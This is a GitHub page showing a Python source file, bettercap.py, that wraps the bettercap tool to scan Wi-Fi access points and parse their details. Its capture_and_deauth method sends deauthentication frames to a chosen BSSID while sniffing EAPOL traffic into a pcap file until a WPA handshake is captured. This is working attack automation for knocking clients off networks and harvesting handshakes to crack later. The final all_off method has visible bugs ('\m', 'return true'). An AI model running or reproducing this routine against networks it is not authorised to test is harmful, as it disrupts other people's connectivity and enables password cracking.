-
Notifications
You must be signed in to change notification settings - Fork 5
/
bettercap.py
159 lines (136 loc) · 5.65 KB
/
bettercap.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
#!/usr/bin/env python3
# coding=utf8
from subprocess import Popen, PIPE, STDOUT
import re
import time
from datetime import datetime
import math
import os
class Bettercap:
END_OF_OUTPUT = '%NINJAEND%'
CAPTURE_LOCATION = '/mnt/capture'
def __init__(self, iface='wlan0'):
self._bettercap = None
self._iface = iface
self._iface_active = None
@property
def iface(self):
return self._iface
@iface.setter
def iface(self, value):
self._iface = value
def start(self):
if self._bettercap == None:
self._bettercap = Popen(['bettercap', '-iface', self._iface, '-no-colors', '-no-history'], shell=False, cwd='/tmp', encoding='utf-8', bufsize=-1, stdout=PIPE, stdin=PIPE, stderr=STDOUT)
self._iface_active = self._iface
else:
print('Bettercap is running already, checking for iface change ...')
if self._iface != self._iface_active:
print('Interface changed! Restarting ...')
self.restart()
else:
print('Bettercap interface did not change, not doing anything.')
return True
def stop(self):
if self._bettercap != None:
print('Writing quit ...')
self._bettercap.stdin.write('quit\n');
print('Flushing ...')
self._bettercap.stdin.flush()
print('Closing ...')
self._bettercap.stdin.close()
print('Waiting ...')
self._bettercap.wait()
print('Resetting ...')
self._bettercap = None
return True
def restart(self):
if self._bettercap != None:
ret_val = self.stop()
if ret_val != True:
return False
time.sleep(1)
return self.start()
def _read(self, stop_on='', retrieve_stdout=True):
print('Reading ...')
keep_reading = True
stdout = ""
regextype = type(re.compile(''))
while keep_reading:
if self._bettercap == None:
print('Whoops. Bettercap apparently just died. I better quit now.')
break
stdout_line = self._bettercap.stdout.readline()
if type(stop_on) is str:
if stdout_line == stop_on:
keep_reading = False
elif type(stop_on) is regextype:
if stop_on.match(stdout_line) != None:
keep_reading = False
if retrieve_stdout == True:
stdout = stdout + stdout_line
if retrieve_stdout == True:
return stdout
else:
return None
def _execute(self, command):
print('Writing command:' + command)
if self._bettercap == None:
print('Bettercap is not running. Starting ...')
self.start()
time.sleep(1)
self._bettercap.stdin.write(command)
self._bettercap.stdin.flush()
print('Command executed!')
return True
def scan_aps(self, timeout):
regex = r'^\u2502\s([\+\-][0-9]{1,4})\sdBm\s\u2502\s([a-f0-9\:]{17})\s\u2502\s([^│;]+)\s\u2502\s([^│;]*)\s+\u2502\s(2\.0|1\.0|)(\s*\([a-zA-Z ]+\))?\s+\u2502\s([0-9]{1,3})\s+\u2502\s([0-9]{0,10})\s+\u2502\s([^│;]*)\s+\u2502\s([^│;]*)\s+\u2502\s([^│;]*)\s+\u2502'
index_dbm = 1
index_bssid = 2
index_ssid = 3
index_encryption = 4
index_wps = 5
index_wps_info = 6
index_channel = 7
index_clients = 8
index_data_sent = 9
index_data_received = 10
index_seen = 11
# TODO: Change ticker.period & time.sleep
self._execute('set wifi.show.sort clients desc; set ticker.period ' + timeout + '; set ticker.commands "clear; wifi.show; !echo \'' + self.END_OF_OUTPUT + '\'; wifi.recon off; ticker off;"; wifi.recon on; ticker on;\n')
print('Sleeping ' + timeout + '...')
time.sleep(int(timeout))
stdout = self._read(stop_on=(self.END_OF_OUTPUT + '\n'), retrieve_stdout=True)
aps = []
matches = re.finditer(regex, stdout, re.UNICODE | re.MULTILINE)
for matchNum, match in enumerate(matches, start=1):
ap = {
'bssid': match.group(index_bssid),
'ssid': match.group(index_ssid),
'encryption': match.group(index_encryption),
'wps': match.group(index_wps),
'wps_info': match.group(index_wps_info),
'channel': match.group(index_channel),
'dbm': match.group(index_dbm),
'clients': match.group(index_clients),
'seen': match.group(index_seen),
'clients': match.group(index_clients),
'data': {
'sent': match.group(index_data_sent),
'received': match.group(index_data_received)
}
}
aps.append(ap)
return aps
def capture_and_deauth(self, bssid, channel):
try:
os.makedirs(self.CAPTURE_LOCATION)
except FileExistsError:
pass
capture_file = self.CAPTURE_LOCATION + '/' + str(math.floor(datetime.now().timestamp())) + '.pcap'
self._execute('set net.sniff.verbose true; set net.sniff.filter ether proto 0x888e; set net.sniff.output ' + capture_file + '; net.sniff on; wifi.recon.channel ' + channel + '; wifi.recon on; wifi.recon ' + bssid + '; wifi.deauth ' + bssid + ';\n')
self._read(stop_on=re.compile(r'.* captured .* handshake .*'), retrieve_stdout=False)
return capture_file
def all_off(self):
self._execute('net.sniff off; wifi.recon off; ticker off;\m')
return true;